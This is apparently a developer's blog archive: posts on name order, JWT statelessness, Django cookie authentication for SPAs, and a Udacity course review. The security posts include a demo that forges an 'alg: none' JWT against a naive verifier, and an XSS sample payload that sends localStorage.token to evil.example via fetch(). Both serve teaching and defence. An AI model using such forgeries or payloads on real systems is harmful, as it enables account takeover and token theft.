Lim Yoong Kang

Name order

2021-01-13T00:00:00+00:00

Just a little something about the first name, last name ordering.

In many parts of Asia, it’s more common to use the surname first, and then the given name. That’s obviously different in the West. Sometimes there are historical reasons why the order is flipped only in English, such as Japanese names. There’s an ongoing discussion to change that in Japan, so we can expect even that to change in the future (and in fact, it’s already changing now).

Back when I lived in Asia, it was normal to call me “Lim Yoong Kang”, where “Lim” is my surname, and “Yoong Kang” my given name. However, when I arrived in Australia, for various reasons it made things easier to reverse the order – making it “Yoong Kang Lim”.

At first that was because I filled in some forms, and then most IT systems automatically assigned the default ordering. Later, it became more convenient to just use that order everywhere, otherwise weird things start to happen (like people assuming “Lim” is my given name). After a while I kind of just accepted that, and it became natural.

I told myself it was a far better compromise than, for example, giving myself an Anglicised name so that people don’t bin my resume. No judgement to those who did end up doing that, as it’s a perfectly understandable decision, but it was something I didn’t want to do.

Anyway, long story short, it kind of stuck after a while and I never really felt right about it, although it wasn’t something I worried about too much.

Well, in 2021, I’ve decided to make more of an effort to change that. The Western ordering is simply that, it’s just Western. I’d probably even call it Eurocentric. The assumption that everyone follows that name order in a culturally diverse society like Australia is clearly invalid. So why keep using it? I’ve decided I don’t have to pander to other people, and I especially don’t want to pander to people who ignore these aspects of my culture. It’s my own name, I should get to decide which order is appropriate.

With that said, starting from this blog I want the ordering of my name to better reflect the conventions of my heritage. I’m hoping I could change that in other places too, where practical.

I made the front page of Hacker News

2020-04-12T00:00:00+00:00

Yesterday, someone submitted one of my blog posts from 2018 to Hacker News, the one about my experience dealing with fillable PDF forms.

It made the front page of Hacker News. For a while, it was ranked pretty high.

Just thought that was worth mentioning!

Year 2019 in review

2020-01-30T00:00:00+00:00

It sucked.

Statelessness is not unique to JWTs

2019-12-31T00:00:00+00:00

JSON Web Tokens (JWTs) are commonly used today in a number of applications, especially as bearer tokens.

JWTs are often said to have the advantage of being “stateless”.

This means it is possible to validate a token without checking any persistent store, such as a database or Redis. For every authenticated request, we avoid an extra hit to the database just to validate the user session.

This statelessness is sometimes said to be the main purpose of using JWTs.

In reality, statelessness is a feature that is not unique to JWTs, and I would argue here that it is probably not the best reason to use JWTs if that is the only benefit you get out of it.

Let’s first examine what properties allow JWTs to be stateless, and then discuss if this is indeed the main advantage of JWTs.

JWTs and cryptographic signing

When people talk about “JWTs”, what they usually mean is a variant called JSON Web Signature, or JWS. Another variant is called JSON Web Encryption, which as far as I know is not as commonly used.

As its name implies, the JWS variant uses cryptographic signing. If you are new to cryptography, signing is a way to create something called a “signature”, a bit of data that is impossible to create without a secret key. By checking this signature, we can verify that it was generated by the party holding this secret key.

You can find examples of JWTs online, but a JWT’s structure is basically this:

header.payload.signature

There are three parts, separated by a period. The header and payload are both encoded with URL-safe base64 encoding, which means that anyone can see their contents by decoding them. The last part, the signature, is generated using cryptographic signing.
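To make the "anyone can see their contents" point concrete, here is a small sketch using only the Python standard library. The token is made up for illustration and its signature part is a placeholder, so nothing here is a real credential.

```python
import base64
import json


def b64url_encode(raw: bytes) -> str:
    """URL-safe base64 without padding, as used for JWT segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Decode a URL-safe base64 segment, restoring the stripped padding."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


# Build a made-up token purely for illustration; the signature is a placeholder.
header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url_encode(json.dumps({"user_id": 123456}).encode())
example_token = f"{header}.{payload}.not-a-real-signature"

# Anyone holding the token can read the first two parts without any key.
header_part, payload_part, _signature = example_token.split(".")
decoded_header = json.loads(b64url_decode(header_part))
decoded_payload = json.loads(b64url_decode(payload_part))
print(decoded_header, decoded_payload)
```

The takeaway is that the header and payload are encoded, not encrypted, so they should never carry anything secret.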

This signature cannot be generated without knowing the secret, which means that a server can be confident that it was generated by a party that knows this secret. If this was generated using symmetric cryptography, then the same key will be used for both signing and validating the signature. The JWT specification also allows for signing using asymmetric cryptography, which means that it is signed with a private key, and validated with a public key.

It also follows that, in order to validate the token, a server will only need to know the secret key (if using symmetric signing) or the public key (if using asymmetric signing). This means the server does not need to check a database to verify that it is a valid token, allowing JWTs to be “stateless”.

That sounds great, what’s the problem?

In reality, there is nothing about this that is unique to JWTs.

A token can be stateless without it having to be a JWT. It just needs cryptographic signing, the same way JWTs use cryptographic signing.

Essentially, all you need to do is use HMAC with SHA to generate a signature, and send it together with the data serialised in some way (e.g. URL-safe base64 encoding).

In fact, major web frameworks like Django allow you to use stateless tokens. If you configure Django to use cookie-based sessions, you are essentially using stateless signed tokens, only that the token is stored and transported in a cookie. That is why it also comes with a few problems of stateless tokens that JWTs also have, namely the problem of invalidating the tokens. No surprises that Django’s implementation uses HMAC with SHA.

By avoiding JWTs, you also avoid all the problems that come with parsing the header. The JWT header was the source of a number of security issues in the past, specifically that it allowed the client to specify the algorithm that the JWT is signed with, of which “none” is an option. Luckily, this has been fixed in most libraries, but that is still not a great sign.
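Here is a deliberately simplified illustration of that class of bug. It is not code from any real JWT library. naive_verify, pinned_verify and the key are hypothetical names for this sketch: the first trusts the algorithm named in the token's own header, the second ignores it.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"server-side-secret"  # hypothetical key for the example


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign(header_b64: str, payload_b64: str) -> str:
    message = f"{header_b64}.{payload_b64}".encode()
    return b64url(hmac.new(SECRET_KEY, message, hashlib.sha256).digest())


def naive_verify(token: str) -> bool:
    """Flawed on purpose: lets the token's own header choose the algorithm."""
    header_b64, payload_b64, signature = token.split(".")
    alg = json.loads(b64url_decode(header_b64))["alg"]
    if alg == "none":
        return True  # no signature check at all
    return hmac.compare_digest(signature.encode(), sign(header_b64, payload_b64).encode())


def pinned_verify(token: str) -> bool:
    """Ignores what the header says and always checks HMAC-SHA256."""
    header_b64, payload_b64, signature = token.split(".")
    return hmac.compare_digest(signature.encode(), sign(header_b64, payload_b64).encode())


# An attacker who does not know SECRET_KEY can still build this token.
forged = ".".join([
    b64url(json.dumps({"alg": "none"}).encode()),
    b64url(json.dumps({"user_id": 1, "admin": True}).encode()),
    "",
])
print(naive_verify(forged), pinned_verify(forged))
```

The forged token passes the naive check and fails the pinned one, which is why the verifier, not the token, should decide the algorithm.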

In my experience, there are other security footguns in the JWT/JOSE specification as well, especially those that come with asymmetric algorithms. For example, there is the jku header parameter, which tells you the URL of the public key you should use to validate the token. That is a strange thing to include in the token, because an attacker could generate a token and make jku point to a public key that belongs to the attacker. If the developer naively trusts these built-in parameters, then they make their systems vulnerable to these exploits. More information can be found here. The specification, in my opinion, has a number of things that the developer needs to know about and guard against.

If the same server or party is both generating and also validating the token, it is probably best to avoid JWTs entirely. Using HMAC and SHA requires very rudimentary cryptography knowledge, has good library support (especially if you use a web framework like Django), and is generally not that easy to mess up.

On top of that, by using HMAC + SHA to generate a token, the token can still be stateless! So, you get all the benefits of statelessness, and none of the disadvantages.

So are JWTs useful at all?

Some would argue that JWTs are not useful, at all. Especially not for session tokens.

I would probably take a softer stance, and say that it can be a viable and pragmatic option in some cases. Note that I do not work in cybersecurity, and this opinion comes solely from the perspective of a developer who builds applications.

One scenario where I would probably use JWTs is if two different servers need to send data to each other, and these two servers are owned by separate organisations. This comes up more often than you would expect.

For example, let’s say I am writing a Python app, and my client has a Java web service. For some reason we need to exchange some data, probably via the user’s browser or mobile app.

By the way, this is a situation similar to OAuth2, where an authorisation server generates a token, which gets sent to a separate resource server that parses that token (OAuth2 commonly uses JWTs, but does not specify a particular token format).

If I use JWTs, I can be fairly confident that my client would be able to decode the JWT using a reasonably mature library.

Since JWT/JOSE is, for better or worse, an established standard by now, I could probably do a lot worse than making my client work with a well-tested JWT/JOSE library. The alternative is to agree with the client to create a token format using an ad hoc serialisation and signing scheme, which can take more development time (both for my client and for myself), and requires a bit of crypto knowledge.

There are more alternatives, of course, like PASETO which was created to address the deficiencies of the JOSE standard. I will not go into those alternatives here.

Can you show me some code to create a stateless token in Django?

Sure. Use the signing module.

Here’s how you do it:

from django.core import signing

data = {'user_id': 123456}

# Here's how you generate a token
token = signing.dumps(data)

# Here's how you validate the token
decoded_data = signing.loads(token, max_age=3600)

If you don’t use Django, find a trusted crypto or HMAC library in your language of choice. In Python you could just use the built-in hmac module. Make sure you compare the signature using a constant-time compare algorithm to prevent timing attacks.
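If you go the hmac route, a rough stand-in for the max_age behaviour could look like the sketch below. The token layout (user id, issue time and signature joined by colons) and the function names are invented for this example. This is not how Django formats its tokens.

```python
import hashlib
import hmac
import time
from typing import Optional

SECRET_KEY = b"replace-with-a-long-random-secret"  # hypothetical


def _sign(message: str) -> str:
    return hmac.new(SECRET_KEY, message.encode(), hashlib.sha256).hexdigest()


def dumps(user_id: int, now: Optional[float] = None) -> str:
    """Made-up layout for this sketch: user_id:issued_at:signature."""
    issued_at = int(time.time() if now is None else now)
    message = f"{user_id}:{issued_at}"
    return f"{message}:{_sign(message)}"


def loads(token: str, max_age: int, now: Optional[float] = None) -> int:
    """Return the user id, or raise ValueError if forged or older than max_age seconds."""
    parts = token.split(":")
    if len(parts) != 3:
        raise ValueError("malformed token")
    user_id, issued_at, signature = parts
    # Check the signature first, in constant time, before trusting any field.
    if not hmac.compare_digest(signature.encode(), _sign(f"{user_id}:{issued_at}").encode()):
        raise ValueError("bad signature")
    current = time.time() if now is None else now
    if current - int(issued_at) > max_age:
        raise ValueError("token expired")
    return int(user_id)
```

The issue time is part of the signed message, so a client cannot extend a token's life by editing the timestamp.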

Summary

Statelessness is often touted as an advantage of JWTs, but in reality that feature is not unique to JWTs. Any token that was generated using cryptographic signing can be stateless, including JWTs.

Furthermore, JWTs introduce some extra security burden on the developer, who needs to be extra careful to avoid the pitfalls of JWTs.

If the same party is generating and validating the token, in my opinion it is best to avoid JWTs entirely. A very good option is including a signature of the payload using HMAC + SHA. Django provides this out of the box, and the Python standard library gives you some good tools to use. This gives you stateless tokens without having to use JWTs.

In my personal opinion as a developer (and not a cybersecurity professional), JWTs can be a pragmatic option in some cases where a standard is useful, as this means decent library support which avoids extra development effort. One such case is when the token needs to be generated by one party, and validated by another.

Cookie-based authentication with SPA and Django

2019-12-07T00:00:00+00:00

Disclaimer: I do not work in security, and this article does not make any security recommendations. For advice specific to your situation, please consult a security professional.

A question I see asked a lot is how to implement authentication between an SPA (e.g. React, Vue, etc.) and a Django API.

The two methods that I frequently see in the wild are either token-based authentication, or cookie-based authentication. The terminology is somewhat confusing as tokens are used for both mechanisms, but “token-based authentication” usually refers to manually inserting a token in a header in an AJAX request, whereas “cookie-based authentication” refers to using cookies to send this automatically.

Sometimes you will see some security-focused articles recommending against using token-based authentication, and advocating cookies instead. Unfortunately, there isn’t a lot of up-to-date information on how to actually do this in Django, so I’m hoping that this article will help.

First, I will explain why many articles recommend using cookies over local storage, and also describe some things that most of those articles don’t tell you. Then I will show you how to do cookie-based auth with Django.

What’s the problem with token-based auth?

When people refer to “token-based auth” they mean attaching a token to a header (frequently the Authorization header) manually in an AJAX request. Here’s an example using the axios library:

const token = "someAuthenticationToken";
axios.get("/some_endpoint/", {
    headers: { Authorization: `Bearer ${token}` }
});

The main objection to this approach is that you will need to store the token somewhere that is accessible using JavaScript. This normally means the browser’s localStorage.

Since you can get the token using JavaScript, if your site is vulnerable to XSS (cross-site scripting), someone can steal that token.

That’s pretty much the main gist of the argument.

Here is an article from Auth0 that recommends against storing tokens in localStorage for the reason I just described.

If you don’t know what XSS is, read the following section, otherwise feel free to skip it.

What’s XSS?

XSS is an exploit where an attacker manages to get malicious JavaScript to run on your browser.

This can happen in a number of ways, and is quite difficult to detect and very easy to miss.

A simple example is if you allow users to submit some text via a form, and you render that text as HTML to other users. Think of something like a message board that allows you to insert HTML in your posts.

Since <script> tags are valid HTML, an attacker could enter in some JavaScript that grabs your localStorage and sends it to some remote server. I’ll leave it to you to find some examples online on how this is done.
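On the defensive side, the usual fix is to escape user-submitted text before rendering it. Here is a tiny sketch with Python's standard html module. The post content and the evil.example URL are made up. If you render through Django templates, autoescaping does this for you by default.

```python
import html

# A hypothetical message-board post submitted by an attacker.
user_post = '<script>fetch("https://evil.example/?t=" + localStorage.token)</script>'

# Escaping turns the markup into inert text, so the browser shows it instead of running it.
safe = html.escape(user_post)
print(safe)
```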

How does using cookies help?

The argument normally goes like this:

You can enable a setting called HttpOnly on session cookies. It’s a confusing name, but HttpOnly means the cookie is not accessible via JavaScript; your browser will still send it automatically on HTTP requests. So in the event that XSS occurs, an attacker would not be able to steal your token directly.
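To show what the flag looks like on the wire, here is a small sketch that builds a Set-Cookie header value with Python's standard http.cookies module. The cookie value is a placeholder. In Django you would not normally do this by hand, since session cookies are HttpOnly by default.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "opaque-session-token"  # hypothetical value
cookie["sessionid"]["httponly"] = True  # hide the cookie from document.cookie
cookie["sessionid"]["secure"] = True    # only send it over HTTPS
cookie["sessionid"]["path"] = "/"

header_value = cookie["sessionid"].OutputString()
print("Set-Cookie:", header_value)
```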

Cookies don’t protect you against XSS

Unfortunately, many articles stop there, and in my opinion readers may get the wrong impression that if you use cookies you’re safe if XSS happens.

You are NOT protected against XSS if you use cookies.

If I were an attacker and could run malicious JavaScript on your browser while you’re logged in, then I could pretty much do anything you can do on your browser. Since the cookies will be sent automatically with each request, I don’t even have to know your token to make authenticated requests. This is equivalent to finding someone’s laptop with an open tab where the owner forgot to log out.

In fact, tokens can expire (and they usually do have a short expiry time) or be invalidated, so stealing a token that may be expired by the time I get my hands on it may not be very useful. It’s more desirable to make your browser do things for me, while you’re still logged in.

For example, I can make an authenticated request on your behalf to change your email address to mine. I can then initiate a password reset, which will send the password reset link to my email address where I can change your password.

Or, if I only cared about your data, I could just do a GET request to the APIs and send the response data off somewhere.

Or, I could run a malicious script to manipulate the DOM and render a form that asks you to re-enter your password, and have that form send the password to me. If you re-use your passwords in other sites, then now all of your accounts online are vulnerable.

Does that mean it doesn’t really matter where I put the token?

That is a decision you will need to make yourself by considering all factors, including risk, as well as other security measures you put in place, e.g. CAPTCHA, OTP code to phone before certain changes, password re-entry, etc.

If you have other protections in place, you may determine that the choice does not make a huge difference.

However, I will not make a security recommendation, because I am not a security professional.

For a more nuanced discussion about this, I can point you to an article about this called Web Storage: the lesser evil for session tokens from an actual security researcher.

I can say, however – hopefully without much controversy – that if a cookie has the HttpOnly and Secure settings turned on, then storing the token in the cookie is probably not more vulnerable than storing it in localStorage, assuming the appropriate CSRF protections are put in place. Using a cookie gives you additional protection against the token being accessed directly by JavaScript.

For that reason, I would normally prefer using a cookie, with the appropriate CSRF protections.

Read on to find out how to do this in various circumstances.

Do I need to serve the SPA using Django templates in order to use cookies?

No, you do not.

But if that’s your deployment setup, then you don’t have to do anything else. Django handles this out of the box.

How do I use cookies if my SPA and Django are deployed separately?

Your browser doesn’t know or care how your SPA and backend are deployed. It only knows the domain of where it’s making requests to.

It is possible to serve your Django and your SPA from the same domain, and this is the setup I would recommend for most applications. One way is to use nginx or another reverse proxy to route requests to the right place based on the path of the request.

If you use nginx, you would be doing something like this (just for illustration, you should be using SSL in your own deployment):

server {
    listen 80;
    server_name example.com;

    location /api/ {
        include proxy_params;
        proxy_pass http://unix:/tmp/gunicorn.sock;
    }

    location / {
        root /path/to/spa;
    }
}

If you use Netlify to serve your SPA, you could also write some redirect/proxy rules.

This might be tricky if you happen to have path conflicts, but you can get over that by namespacing the URLs for the Django API, e.g. by having all requests to paths starting with /api/ go to Django.

You’ll also need to set your CSRF cookie somehow, or your request to login will fail. Since your page is being rendered by your SPA rather than Django, your CSRF cookie (or any other cookies that Django cares about) wouldn’t be set in the beginning. To get around this, you need to make an initial request to an endpoint which will set the cookie.

If you set up the proxy correctly, then you can basically have some backend code that looks like this (for illustration only, this isn’t production-ready code):

import json
from django.contrib.auth import authenticate, login
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import ensure_csrf_cookie
from django.http import JsonResponse


@ensure_csrf_cookie
def set_csrf_token(request):
    """
    This will be `/api/set-csrf-cookie/` on `urls.py`
    """
    return JsonResponse({"details": "CSRF cookie set"})


@require_POST
def login_view(request):
    """
    This will be `/api/login/` on `urls.py`
    """
    data = json.loads(request.body)
    username = data.get('username')
    password = data.get('password')
    if username is None or password is None:
        return JsonResponse({
            "errors": {
                "__all__": "Please enter both username and password"
            }
        }, status=400)
    user = authenticate(username=username, password=password)
    if user is not None:
        login(request, user)
        return JsonResponse({"detail": "Success"})
    return JsonResponse(
        {"detail": "Invalid credentials"},
        status=400,
    )

Then from your frontend, you can write some functions like this:

const loginRequest = async (username, password) => {
    try {
        await axios.post(
            '/api/login/',
            { username, password },
            { headers: { "X-CSRFToken": getCsrfToken(), "Content-Type": "application/json" } }
        );
    } catch (error) {
        // handle error here
    }
}

const setCsrf = async () => {
    await axios.get('/api/set-csrf-cookie/');
}

You’re pretty much done at this point.

What if my SPA and Django are on different domains?

You’ll need to relax quite a few security settings, and it’s quite complicated so I’d strongly advise not doing this.

In this case, I’d lean towards using a token in the request header. It’s far less complicated, and not as easy to screw up.

But if you can’t avoid it… read on.

What’s being described here is a setup I see sometimes (actually pretty often) where the SPA and the API are on different domains.

Often they are subdomains, e.g. api.example.com for the API and app.example.com for the SPA. But sometimes they are also on completely different domains.

There are a number of things you need to do to get cross-domain requests to work with cookies.

Use the correct CORS settings

Browsers have a security feature called the same-origin policy that blocks cross-domain requests by default. But you are able to relax this security feature by enabling something called CORS (Cross-Origin Resource Sharing).

To enable CORS, you will need to configure your server to return a number of headers that suit your needs.

To enable cross-domain requests at all, the server will need to return this header:

Access-Control-Allow-Origin: https://app.example.com

It is vital that you whitelist only the domains you trust; otherwise you leave yourself vulnerable.

For cookies to be sent cross-domain, you will also need to enable this header:

Access-Control-Allow-Credentials: true
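As a sketch of the logic behind those two headers (in practice django-cors-headers or nginx would do this for you), the function below echoes back the origin only if it is on an allow-list. ALLOWED_ORIGINS and cors_headers are hypothetical names for this example. Note that when credentials are allowed, browsers will not accept a wildcard origin, so the specific origin has to be returned.

```python
ALLOWED_ORIGINS = {"https://app.example.com"}  # hypothetical allow-list


def cors_headers(request_origin):
    """Return the CORS response headers for a request's Origin header value."""
    if request_origin not in ALLOWED_ORIGINS:
        # Unknown origin: send no CORS headers, so the browser blocks the response.
        return {}
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        # The response differs per origin, so caches need to key on it.
        "Vary": "Origin",
    }
```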

Many Django applications use a library called django-cors-headers. If that’s what you’re using, please refer to the documentation to enable the two headers.

You could also have nginx return those headers, which is probably a little better.

Turn off the `SameSite` setting

If you use cookies, you will need to care about something called CSRF (cross-site request forgery). Most likely you already have had experience with this by attaching {% csrf_token %} to your forms, if you use Django.

A CSRF attack is when someone manages to get you to make a POST request from a different origin, e.g. by making you fill in a form in a different domain that targets your app’s domain, or an AJAX request. Since cookies are sent automatically, this means you will end up making an authenticated request, which you didn’t intend.

Kind of like what you’re trying to do with this deployment setup, except maliciously.

A very recent addition to cookies is a setting called SameSite, with the purpose of preventing some CSRF attacks. As its name implies, a cookie with this setting won’t be sent in cross-domain requests.

Starting from Django 2.1, session cookies and CSRF cookies have this setting turned on by default.

Prior to version 2.1, Django relied on a CSRF token to protect against CSRF attacks. The way this works is that in POST requests, the browser needs to send a CSRF token through either one of two methods – either together with a form submission (that’s why you have to put {% csrf_token %} in your forms), or in a header (X-CSRFToken by default) for Ajax requests (you grab the token from a non-HttpOnly cookie).
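The underlying idea can be sketched in a few lines. This is a stripped-down "double submit" check with made-up function names. Django's actual implementation is more involved (for example, it masks the token), so treat this purely as an illustration of the concept.

```python
import hmac
import secrets


def new_csrf_token() -> str:
    """Random value the server sets in a cookie that JavaScript is allowed to read."""
    return secrets.token_urlsafe(32)


def csrf_check(cookie_token, header_token) -> bool:
    """Accept the request only if the header repeats the cookie's value.

    A page on another origin can trigger a request that carries the cookie,
    but it cannot read the cookie to copy its value into the header.
    """
    if not cookie_token or not header_token:
        return False
    return hmac.compare_digest(cookie_token.encode(), header_token.encode())
```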

Actually, Django still does this as some old browsers may not support SameSite cookies yet.

In the case where the SPA and the Django API are on different domains, you cannot have the SameSite setting enabled for your session cookies and CSRF cookies. So you’ll need to add these two settings to your settings.py file:

SESSION_COOKIE_SAMESITE = None
CSRF_COOKIE_SAMESITE = None

EDIT (Aug 2020): Starting Django 3.1 you’ll need to use the string ‘None’, see: https://docs.djangoproject.com/en/3.1/ref/settings/#csrf-cookie-samesite

You’ll also need to explicitly tell Django to trust CSRF tokens sent from your SPA’s domain using the CSRF_TRUSTED_ORIGINS setting:

CSRF_TRUSTED_ORIGINS = ["app.example.com"]
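Pulling the cross-domain settings together, a settings.py fragment for newer Django versions might look like the sketch below. Two assumptions are baked in: the site is served over HTTPS (browsers generally reject SameSite=None cookies that are not also Secure), and you are on Django 4.0 or later, where CSRF_TRUSTED_ORIGINS entries must include the scheme.

```python
# settings.py fragment (a sketch, not a complete configuration)

# The string "None", not the Python None object (needed from Django 3.1).
SESSION_COOKIE_SAMESITE = "None"
CSRF_COOKIE_SAMESITE = "None"

# SameSite=None cookies are generally only accepted by browsers when Secure is set.
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True

# From Django 4.0, trusted origins must include the scheme.
CSRF_TRUSTED_ORIGINS = ["https://app.example.com"]
```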

It’s always important that you validate CSRF tokens when using cookies, and if you use these configurations it is even more crucial, as you can no longer rely on the SameSite behaviour of cookies.

If you use Django REST Framework, APIView and ViewSet will use the csrf_exempt decorator, meaning CSRF protections are being bypassed by default (because you might not be using cookies).

You will need to configure your viewsets to use the SessionAuthentication backend, which will enable CSRF protections.
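One way to do that for the whole project, rather than per viewset, is through the REST_FRAMEWORK setting. This is a minimal sketch, so adjust the list if you also need other authentication classes.

```python
# settings.py fragment: make SessionAuthentication the default for all DRF views.
REST_FRAMEWORK = {
    "DEFAULT_AUTHENTICATION_CLASSES": [
        "rest_framework.authentication.SessionAuthentication",
    ],
}
```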

Use `withCredentials` when making AJAX requests

By default, cookies are not sent (or set) for cross-domain requests (regardless of CORS settings).

You’ll need to explicitly tell your request to send cookies via the withCredentials property, e.g.:

axios
    .get("https://api.example.com/some_resource/", { withCredentials: true })
    .then(console.log)
    .catch(console.log);

Summary

In this article, I discussed why cookies, specifically HttpOnly cookies, are often recommended for session tokens over saving tokens in local storage.

I explained that using cookies doesn’t mean that your application is protected against XSS. However, it does mean that someone can’t steal your session token directly.

I then discussed three deployment options, and how cookies work in each one:

SPA served via Django templates, where no action is needed.
SPA and Django API on the same domain, which requires a small amount of frontend code to set a CSRF cookie, as this is no longer done automatically.
SPA and Django API on different domains, which requires relaxing a number of security settings (CORS, SameSite).

I will hopefully update this post with an actual example repo once I have the time to do it.

If you have any questions or corrections about this post, please feel free to send me an email. I’d love to hear about what you’re doing.

Just completed Udacity’s Data Engineering Nanodegree!

2019-10-16T00:00:00+00:00

So, this happened recently:

Having previously completed the Machine Learning Engineer Nanodegree back in 2018, I’ve now completed 2 nanodegrees from Udacity.

Thanks again to my employer Airteam for sponsoring this, and continually investing in my education and professional development.

I want to talk a little bit about my experiences with the course, and what I’ve learned.

Course structure

First, let’s talk a bit about how the course is structured.

I was part of the first cohort to sign up for this course, which at the time still had a term-based structure. That means there was a fixed term of about 5 months, and if you didn’t complete all the projects, you basically didn’t get the certificate (which is probably useless to me anyway).

Udacity has since converted all Nanodegrees to subscription-based courses, where you pay a certain amount of money each month, and can take as long as you’d like.

There are 5 modules, and in each one you are required to submit one or two guided projects. Your submission will be reviewed by a contractor hired by Udacity.

The projects are mostly done in the browser, and could be a Jupyter workspace, or a customised workspace on what I believe is a Docker container.

The 5 modules are:

1. Data Modeling

This module is an introduction to databases, and covers Postgres and Apache Cassandra. Basically one relational database, and one NoSQL database. There was a basic project for each database, so two projects in total.

2. Cloud Data Warehouses

An introduction to data warehousing, specifically on AWS. It talked about why transactional and analytical databases require different designs. The specific technology used for the data warehouse is Amazon Redshift. In the project, we did ETL from a data source to create a star schema database in Redshift.

3. Spark and Data Lakes

As the name probably tells you, it’s an introduction to Apache Spark, and also how to build a Data Lake using Spark. The project uses the same schema as the previous module.

4. Data Pipelines with Airflow

Basically, an introduction to Apache Airflow, and how you can use it to create data pipelines. You basically rebuild the cloud data warehouse project using Airflow, with some minor changes to leverage Airflow.

5. Capstone Project

In this module, you do an open-ended project using either Udacity-provided data sources, or you could find your own datasets. You complete a writeup, and submit it.

Student and peer experience

For my cohort, we were invited into a shared Slack workspace with other students and our assigned mentors. Each mentor is assigned to a small group of students.

Unfortunately, they’ve since moved newer students to Student Hub, which is essentially a worse version of Slack.

Quality of video lectures

Just for context, I’d previously done the machine learning nanodegree as mentioned, and in that nanodegree I experienced some of the best and clearest instruction I’ve ever received in my life through the video lectures.

Unfortunately, the Data Engineering Nanodegree’s lectures were a bit of a letdown this time, and in my opinion not of their usual quality (at least not of the quality of the machine learning nanodegree). The lectures were not very polished, had very little post-editing, and did not seem rehearsed.

The course instructors who appeared in the videos appear to not be Udacity employees, but rather external “subject matter experts” contracted to record videos on the course content.

That in itself is not usually a problem, and Udacity has done that successfully in the past.

The problem is that the videos didn’t appear to have gone through much QA after being recorded, and there appeared to be a lack of preparation before recording.

A specific example is numerous instances in the videos where a course instructor stumbles on sentences and repeats the sentence again, probably expecting the video to be edited appropriately.

The worst parts were the data warehousing and data lakes sections, where the instructor appeared to be thinking of what to say on the fly. There were numerous pauses, long “uhhhs” and “ummms” which got REALLY annoying after a while because once you notice it you can’t unhear it. I had to put the videos on 2x speed, and even then it was barely tolerable.

If I might offer a suggestion to improve the video lectures: It would be MUCH better if course instructors were to prepare a script, and to read from that script in the videos. This isn’t theatre or acting class – it’s fine to read from a script, and is far better than just winging it during recording.

It wasn’t uniformly bad though, the Airflow and Spark sections actually were of their usual polished quality in my opinion. It’s likely that those lectures were either rehearsed or read from a prepared script, judging by the lack of “uhhs” and “umms”, and any stumbling. Any mistakes were probably edited out.

Quality of course content

The course has a substantial practical bent, rather than focusing on theory and motivation. The course is an excellent choice if you want to learn “how” to do things like ETL and Data Warehousing, on cloud providers like AWS.

I felt it was probably slightly thin on the “why” side of some things. So if you don’t have any experience at all working with databases, it’s possible you might get a little bit confused during the course.

Specifically, I wished there was more treatment on what the consumers of data engineering (like BI analysts or data scientists) expect and how they use the solutions we build.

I personally think that was fine, and you will probably get the most value out of this course if you do have a background working with databases.

For a deeper treatment of this, it’s probably better to read from a book anyway. I think one of the instructors recommended one from Kimball and Ross, which I’m planning to get.

Quality of the projects

All of the projects (except the capstone) were based on the same problem domain (a song streaming startup), with the same data, using the same schema.

So it’s just a matter of doing the same thing, using different tools. The difficulty of that is highly dependent on how good you are at learning a new API.

As an experienced developer, once I understood what was expected in the project, I could finish the project in under 2 hours.

But I think most people on the course Slack agreed that the project instructions were quite confusing. Often, I was confused myself at some of the instructions.

The project reviews were sometimes helpful, but often they were pretty pedantic, and your submission may get rejected for things like forgetting to delete a code comment in the Jupyter notebook cells.

For context, there were comments in the provided workspaces that were meant to mark sections to show where you’re meant to put in code, e.g. # TODO: complete section here. Deleting the comments did absolutely nothing to help me understand data engineering, but the submission will get rejected if you don’t do it. I felt like it was a bit of a waste of time.

Some projects can also take a long time to run due to the amount of data, so if you’re doing it in the Udacity-provided workspace, it can go to sleep before it’s complete. My suggestion to avoid that is, don’t use the whole dataset. Work on a smaller dataset, verify it works, then replace the code with the full dataset BUT DON’T RUN IT. Just submit it as it is.

Mentoring

This is one aspect that I can’t comment on, because I didn’t make use of it. I didn’t actually want any mentoring, but mentoring was pushed onto me. The mentors were actually hired from a pool of people who have completed other nanodegrees in the past, which means I received an invitation to apply too, but I didn’t have the time for that.

So there’s a chance you get someone who has done a nanodegree, but isn’t really experienced as a data engineer.

The specific mentor I was assigned to lives in a different timezone and the time difference was quite unfortunate.

At one point I fell behind in the course due to illness. What happened then is that every Sunday night, between 1am and 3am, I would get pinged by my mentor asking “how’s progress” (despite my local time being on my Slack profile), along with some basic advice on how to use AWS.

I was stupid enough to forget to turn off notifications on Slack, so that meant a few sleepy Mondays until I finally asked my mentor to stop. I explained that while I appreciated the advice about AWS, I was probably going to be fine because I happen to use AWS for a living.

However, many people on Slack reported that they benefited from their mentor, including the mentor I was assigned to, so your mileage may vary.

Verdict

There were a few problems with the course, and reviews online (especially on Reddit) haven’t been very kind. It’s true that the course felt like it was done in a rush, and it does show. There were also some issues like the content not being complete at launch time, and course content was added later (which didn’t affect me because I was slow anyway).

But I did learn a few things, and that’s what matters in the end.

Would I recommend the course? When I enrolled, the price of the course was $1300. That’s less than half the current price.

At the current price point of $2669 for 5 months access (and a monthly fee after), I personally wouldn’t recommend it, unless you happen to have a lot of money. It’s extremely expensive for what you get.

You’re definitely not going to get a job in data engineering with only this nanodegree, but it’s marketed like it’s a pathway to a data engineering career. Sorry, but it’s not. It is a good complement, though, if you already have relevant work experience, probably with cloud platforms like AWS and some database experience.

Although I learned a lot from their courses, I doubt I will do another nanodegree, unless I suddenly start earning a lot more money (in which case I’ll attempt the self driving car one).

txtimg – A library for text-based images

2019-09-19T00:00:00+00:00

Recently, I’ve been doing some translation work for a certain community on the internet. As far as I’m aware, the community mostly lives on Twitter and a few other niche forums.

Anyway, sometimes the translations can get pretty long, e.g. a radio or a TV broadcast.

That means a tweetstorm would be really hard to read.

The solution people usually come up with is to write the translations in a word processor, and take screenshots of the file. So the result is something we call a “text-based image”.

